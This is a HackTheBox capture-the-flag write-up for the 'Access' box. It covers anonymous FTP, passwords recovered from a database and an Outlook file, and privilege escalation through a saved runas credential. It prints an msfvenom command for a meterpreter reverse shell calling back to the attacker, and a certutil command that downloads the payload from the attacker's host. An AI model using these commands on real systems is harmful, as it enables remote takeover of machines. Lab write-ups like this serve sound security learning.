Hackthebox: Access write-up

Recon and enumeration

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So starting off the box with a typical nmap scan we get to see that there’s anonymous login allowed on the FTP server, so gotta check that out first of course. Login with user ‘anonymous’ and just press enter for the password.

Inside there’s a couple documents ‘backup.mdb’ and ‘access control.zip’ the latter of which is password protected. Opening the mdb file there’s an engineer’s password of ‘access4u@security’ which gives you the password to the zip as an outlook file. Inside there is another password of ‘4Cc3ssC0ntr0ller’ for the ‘security’ account. This can be used to login to telnet with.

This will give us the user flag, so now it’s time for some privilege escalation

Privilege escalation

I got stuck on a bit of a rabbithole with this one following a trail that I was hopeful may lead to something cool with the application ‘yawcam’ installed, turns out I needed to think a bit more basic

On the desktop of the user ‘Public’ there was a .lnk file that had this inside it

LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
                                                                       runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
                                                                                                                                                                                           wN]ND.Q`Xaccess_8{E3
                                                                                                                                                                                                               Oj)H
)ΰ[_8{E3
        Oj)H
            )ΰ[ 1SPSXFL8C&me*S-1-5-21-953262931-566350628-63446256-500


Key part of this being: ‘runas /user:ACCESS\Administrator /savecred’

This meant I could upload a reverse shell and use the /savecred option when I run the exe file would run the file as the administrator. Fire up msfvenom and create the binary with:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9998 -f exe > shell.exe

I then had some trouble getting that actual exe file onto the server but after some googling found out I could use ‘certutil’ to get the file on there with this command:

certutil -urlcache -split -f http://10.10.14.7:8000/shell.exe shell.exe

From here I just had to ‘runas’ the malicious exe file with the ‘/savecred’ added onto the command and start up a listener on my attacking box and from there we are now the admin 🙂

Closing thoughts

This one was pretty easy, but I learned a new way to upload files onto a server and ‘readpst’ on linux to read outlook files is also pretty cool. gg!